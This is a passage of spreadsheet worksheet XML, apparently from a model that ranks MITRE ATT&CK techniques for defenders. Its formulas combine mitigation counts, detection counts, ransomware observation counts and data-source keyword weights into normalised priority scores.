        <f t="array" ref="AL304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC304)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM304" s="25">
        <f>IF(AL304="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN304" s="52">
        <v>0</v>
      </c>
      <c r="AO304" s="51">
        <v>0</v>
      </c>
      <c r="AP304" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9285714285714285E-2</v>
      </c>
      <c r="AQ304" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.4285714285714279E-2</v>
      </c>
      <c r="AR304" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.4285714285714279E-2</v>
      </c>
      <c r="AS304" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT304" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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05" spans="1:47" ht="48">
      <c r="A305" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.8333333333333328E-2</v>
      </c>
      <c r="B305" s="25">
        <f>SUM(H305,M305,V305)*(1+SUM(AE305,AG305,AI305,AK305,AM305))</f>
        <v>0.31666666666666671</v>
      </c>
      <c r="C305" s="25" t="s">
        <v>1256</v>
      </c>
      <c r="D305" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E305" s="25" t="s">
        <v>1257</v>
      </c>
      <c r="F305" s="51">
        <v>1</v>
      </c>
      <c r="G305" s="51">
        <v>1</v>
      </c>
      <c r="H305" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I305">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J305">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K305">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L305">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M305" s="25">
        <v>0</v>
      </c>
      <c r="N305" s="51">
        <v>0</v>
      </c>
      <c r="O305" s="51">
        <v>1</v>
      </c>
      <c r="P305" s="51">
        <v>0</v>
      </c>
      <c r="Q305" s="51">
        <v>0</v>
      </c>
      <c r="R305" s="52" t="s">
        <v>1258</v>
      </c>
      <c r="S305" s="51">
        <v>7</v>
      </c>
      <c r="T305" s="52" t="s">
        <v>1259</v>
      </c>
      <c r="U305" s="51">
        <v>7</v>
      </c>
      <c r="V305" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1380952380952381</v>
      </c>
      <c r="W305">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X305">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y305">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z305">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA305">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB305">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC305" s="29" t="s">
        <v>1260</v>
      </c>
      <c r="AD305" s="25" t="str" cm="1">
        <f t="array" ref="AD305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC305)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE305" s="25">
        <f>IF(AD305="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF305" s="25" t="str" cm="1">
        <f t="array" ref="AF305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC305)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG305" s="25">
        <f>IF(AF305="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH305" s="25" t="str" cm="1">
        <f t="array" ref="AH305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC305)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI305" s="25">
        <f>IF(AH305="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ305" s="25" t="str" cm="1">
        <f t="array" ref="AJ305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC305)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK305" s="25">
        <f>IF(AJ305="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL305" s="25" t="str" cm="1">
        <f t="array" ref="AL305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC305)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM305" s="25">
        <f>IF(AL305="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN305" s="52">
        <v>2</v>
      </c>
      <c r="AO305" s="51">
        <v>1</v>
      </c>
      <c r="AP305" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.8333333333333328E-2</v>
      </c>
      <c r="AQ305" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10555555555555557</v>
      </c>
      <c r="AR305" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10555555555555557</v>
      </c>
      <c r="AS305" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT305" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU30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06" spans="1:47" ht="32.1">
      <c r="A306" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6952380952380953E-2</v>
      </c>
      <c r="B306" s="25">
        <f>SUM(H306,M306,V306)*(1+SUM(AE306,AG306,AI306,AK306,AM306))</f>
        <v>0.26952380952380955</v>
      </c>
      <c r="C306" s="25" t="s">
        <v>1261</v>
      </c>
      <c r="D306" s="25" t="s">
        <v>391</v>
      </c>
      <c r="E306" s="25" t="s">
        <v>1262</v>
      </c>
      <c r="F306" s="51">
        <v>1</v>
      </c>
      <c r="G306" s="51">
        <v>1</v>
      </c>
      <c r="H306" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I306">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J306">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K306">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L306">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M306" s="25">
        <v>0</v>
      </c>
      <c r="N306" s="51">
        <v>0</v>
      </c>
      <c r="O306" s="51">
        <v>1</v>
      </c>
      <c r="P306" s="51">
        <v>0</v>
      </c>
      <c r="Q306" s="51">
        <v>0</v>
      </c>
      <c r="R306" s="52" t="s">
        <v>1263</v>
      </c>
      <c r="S306" s="51">
        <v>7</v>
      </c>
      <c r="T306" s="51" t="s">
        <v>1264</v>
      </c>
      <c r="U306" s="51">
        <v>7</v>
      </c>
      <c r="V306" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1380952380952381</v>
      </c>
      <c r="W306">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X306">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y306">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z306">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA306">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB306">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC306" s="29" t="s">
        <v>1216</v>
      </c>
      <c r="AD306" s="25" t="str" cm="1">
        <f t="array" ref="AD306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC306)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE306" s="25">
        <f>IF(AD306="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF306" s="25" t="str" cm="1">
        <f t="array" ref="AF306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC306)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG306" s="25">
        <f>IF(AF306="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH306" s="25" t="str" cm="1">
        <f t="array" ref="AH306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC306)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI306" s="25">
        <f>IF(AH306="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ306" s="25" t="str" cm="1">
        <f t="array" ref="AJ306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC306)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK306" s="25">
        <f>IF(AJ306="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL306" s="25" t="str" cm="1">
        <f t="array" ref="AL306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC306)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM306" s="25">
        <f>IF(AL306="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN306" s="52">
        <v>0</v>
      </c>
      <c r="AO306" s="51">
        <v>0</v>
      </c>
      <c r="AP306" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6952380952380953E-2</v>
      </c>
      <c r="AQ306" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.9841269841269847E-2</v>
      </c>
      <c r="AR306" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.9841269841269847E-2</v>
      </c>
      <c r="AS306" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT306" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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07" spans="1:47">
      <c r="A307" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.8809523809523807E-2</v>
      </c>
      <c r="B307" s="25">
        <f>SUM(H307,M307,V307)*(1+SUM(AE307,AG307,AI307,AK307,AM307))</f>
        <v>0.18809523809523809</v>
      </c>
      <c r="C307" s="25" t="s">
        <v>1265</v>
      </c>
      <c r="D307" s="25" t="s">
        <v>464</v>
      </c>
      <c r="E307" s="25" t="s">
        <v>1266</v>
      </c>
      <c r="F307" s="51">
        <v>1</v>
      </c>
      <c r="G307" s="51">
        <v>0</v>
      </c>
      <c r="H307" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I307">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J307">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K307">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L307">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M307" s="25">
        <v>0</v>
      </c>
      <c r="N307" s="51">
        <v>0</v>
      </c>
      <c r="O307" s="51">
        <v>1</v>
      </c>
      <c r="P307" s="51">
        <v>0</v>
      </c>
      <c r="Q307" s="51">
        <v>0</v>
      </c>
      <c r="R307" s="52" t="s">
        <v>1267</v>
      </c>
      <c r="S307" s="51">
        <v>2</v>
      </c>
      <c r="T307" s="52" t="s">
        <v>1268</v>
      </c>
      <c r="U307" s="51">
        <v>12</v>
      </c>
      <c r="V307" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1380952380952381</v>
      </c>
      <c r="W307">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X307">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y307">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z307">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA307">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB307">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC307" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD307" s="25" t="str" cm="1">
        <f t="array" ref="AD307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC307)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE307" s="25">
        <f>IF(AD307="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF307" s="25" t="str" cm="1">
        <f t="array" ref="AF307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC307)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG307" s="25">
        <f>IF(AF307="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH307" s="25" t="str" cm="1">
        <f t="array" ref="AH307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC307)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI307" s="25">
        <f>IF(AH307="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ307" s="25" t="str" cm="1">
        <f t="array" ref="AJ307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC307)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK307" s="25">
        <f>IF(AJ307="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL307" s="25" t="str" cm="1">
        <f t="array" ref="AL307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC307)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM307" s="25">
        <f>IF(AL307="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN307" s="52">
        <v>0</v>
      </c>
      <c r="AO307" s="51">
        <v>0</v>
      </c>
      <c r="AP307" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.8809523809523807E-2</v>
      </c>
      <c r="AQ307" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.2698412698412698E-2</v>
      </c>
      <c r="AR307" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.2698412698412698E-2</v>
      </c>
      <c r="AS307" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT307" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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08" spans="1:47" ht="48">
      <c r="A308" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333336E-2</v>
      </c>
      <c r="B308" s="25">
        <f>SUM(H308,M308,V308)*(1+SUM(AE308,AG308,AI308,AK308,AM308))</f>
        <v>0.31033333333333341</v>
      </c>
      <c r="C308" s="25" t="s">
        <v>1269</v>
      </c>
      <c r="D308" s="25" t="s">
        <v>1270</v>
      </c>
      <c r="E308" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F308" s="51">
        <v>1</v>
      </c>
      <c r="G308" s="51">
        <v>1</v>
      </c>
      <c r="H308" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I308">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J308">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K308">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L308">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M308" s="25">
        <v>0</v>
      </c>
      <c r="N308" s="51">
        <v>0</v>
      </c>
      <c r="O308" s="51">
        <v>0</v>
      </c>
      <c r="P308" s="51">
        <v>2</v>
      </c>
      <c r="Q308" s="51">
        <v>4</v>
      </c>
      <c r="R308" s="51" t="s">
        <v>1271</v>
      </c>
      <c r="S308" s="51">
        <v>2</v>
      </c>
      <c r="T308" s="52" t="s">
        <v>1272</v>
      </c>
      <c r="U308" s="51">
        <v>9</v>
      </c>
      <c r="V308" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333336</v>
      </c>
      <c r="W308">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X308">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y308">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z308">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA308">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB308">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC308" s="29" t="s">
        <v>217</v>
      </c>
      <c r="AD308" s="25" t="str" cm="1">
        <f t="array" ref="AD308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC308)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE308" s="25">
        <f>IF(AD308="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF308" s="25" t="str" cm="1">
        <f t="array" ref="AF308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC308)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG308" s="25">
        <f>IF(AF308="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH308" s="25" t="str" cm="1">
        <f t="array" ref="AH308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC308)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI308" s="25">
        <f>IF(AH308="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ308" s="25" t="str" cm="1">
        <f t="array" ref="AJ308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC308)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK308" s="25">
        <f>IF(AJ308="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL308" s="25" t="str" cm="1">
        <f t="array" ref="AL308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC308)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM308" s="25">
        <f>IF(AL308="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN308" s="60">
        <v>0</v>
      </c>
      <c r="AO308" s="51">
        <v>0</v>
      </c>
      <c r="AP308" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333336E-2</v>
      </c>
      <c r="AQ308" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444446</v>
      </c>
      <c r="AR308" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444446</v>
      </c>
      <c r="AS308" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT308" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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09" spans="1:47" ht="32.1">
      <c r="A309" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.19462000000000002</v>
      </c>
      <c r="B309" s="25">
        <f>SUM(H309,M309,V309)*(1+SUM(AE309,AG309,AI309,AK309,AM309))</f>
        <v>0.2795333333333333</v>
      </c>
      <c r="C309" s="25" t="s">
        <v>1273</v>
      </c>
      <c r="D309" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E309" s="25" t="s">
